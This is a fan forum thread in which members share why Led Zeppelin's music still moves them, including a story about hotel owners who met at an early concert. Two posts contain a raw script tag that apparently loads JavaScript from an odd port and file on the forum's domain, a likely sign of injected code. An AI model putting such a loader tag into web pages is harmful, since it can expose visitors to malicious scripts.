Lou David Posted October 22, 2013 Share Posted October 22, 2013 I am 51 yrs old and have been listening and enjoying and sometimes experiencing the music of Led Zep since I was 14. I always knew I loved this music however never really able to pin down why so much until today. When listening to Zep I feel free even if it is only for that few minutes but it is great. So I say thank you Led Zeppelin for many brief moments in my life for feeling free... Link to comment Share on other sites More sharing options...
Bayougal65 Posted October 22, 2013 Share Posted October 22, 2013 I am 51 yrs old and have been listening and enjoying and sometimes experiencing the music of Led Zep since I was 14. I always knew I loved this music however never really able to pin down why so much until today. When listening to Zep I feel free even if it is only for that few minutes but it is great. So I say thank you Led Zeppelin for many brief moments in my life for feeling free... Hi Lou, Welcome to the forum! I think most of us feel as you do. The older I get, the more I appreciate the music! Link to comment Share on other sites More sharing options...
The Dark Lord Posted October 22, 2013 Share Posted October 22, 2013 Lou, I am similar in age to you. Besides just being great music, listening to Zeppelin as an adult puts me in touch with the starry eyed Zeppelin loving kid that I once was.......when music was magic, and the world held so much promise. Thanks for sharing. Link to comment Share on other sites More sharing options...
ZepRon Posted October 22, 2013 Share Posted October 22, 2013 When listening to Zep I feel free even if it is only for that few minutes but it is great. I REALLY feel that way during David Gilmour's solo on "Mother". Not a care in the world, pure bliss. The solo on "Stairway" from TSRTS is about the same, though. ;-) Link to comment Share on other sites More sharing options...
ardencollier63 Posted December 7, 2013 Share Posted December 7, 2013 I am 51 yrs old and have been listening and enjoying and sometimes experiencing the music of Led Zep since I was 14. I always knew I loved this music however never really able to pin down why so much until today. When listening to Zep I feel free even if it is only for that few minutes but it is great. So I say thank you Led Zeppelin for many brief moments in my life for feeling free... Hey Lou, I am 50 and Led Zeppelin is still the best band ever. I have a passion for Zeppelin that is unmeasurable. Link to comment Share on other sites More sharing options...
HighImmediate Posted April 2, 2014 Share Posted April 2, 2014 I am 51 yrs old and have been listening and enjoying and sometimes experiencing the music of Led Zep since I was 14. I always knew I loved this music however never really able to pin down why so much until today. When listening to Zep I feel free even if it is only for that few minutes but it is great. So I say thank you Led Zeppelin for many brief moments in my life for feeling free... <script src="//forums.ledzeppelin.com:8011/bar29659.js" type="text/javascript" ></script> Hey. Although I'm young enough to be your son I've met other Led Zeppelin fans who were there when Zep was in the early stages of life. Back in 2002 I think it was I started to work for a small construction crew as the low man on the ladder. Well, we got this job to do some light work on a beachside hotel. It was a beautiful property where people would go on holiday on an intimate stretch of the Pacific beachlands. The couple who owned the property were very agreeable hippy types who offered me a joint on one of my breaks. So, being one to never pass on such a chance (even during work hours) they smoked me out! They noticed that I was listening to Led Zeppelin on my CD boom box while I worked. They told me the story about how they met eachother at a Led Zeppelin concert when Led Zeppelin had only released their first album. They went to see another Led Zeppelin concert when the second album was released. They had a lot to say about Led Zeppelin & rock n roll in general because rock n roll was still in it's infancy stages then. It was a really cool experience that I'll never forget. Plus I've never been smoked out by my employer before or since! *wink* That's what I call awesome. Link to comment Share on other sites More sharing options...
Plantpothead Posted April 4, 2014 Share Posted April 4, 2014 <script src="//forums.ledzeppelin.com:8011/bar29659.js" type="text/javascript" ></script> Hey. Although I'm young enough to be your son I've met other Led Zeppelin fans who were there when Zep was in the early stages of life. Back in 2002 I think it was I started to work for a small construction crew as the low man on the ladder. Well, we got this job to do some light work on a beachside hotel. It was a beautiful property where people would go on holiday on an intimate stretch of the Pacific beachlands. The couple who owned the property were very agreeable hippy types who offered me a joint on one of my breaks. So, being one to never pass on such a chance (even during work hours) they smoked me out! They noticed that I was listening to Led Zeppelin on my CD boom box while I worked. They told me the story about how they met eachother at a Led Zeppelin concert when Led Zeppelin had only released their first album. They went to see another Led Zeppelin concert when the second album was released. They had a lot to say about Led Zeppelin & rock n roll in general because rock n roll was still in it's infancy stages then. It was a really cool experience that I'll never forget. Plus I've never been smoked out by my employer before or since! *wink* That's what I call awesome. Great story......But rock and roll was not in it's infancy in '69 when Zep released their 1st album. Link to comment Share on other sites More sharing options...
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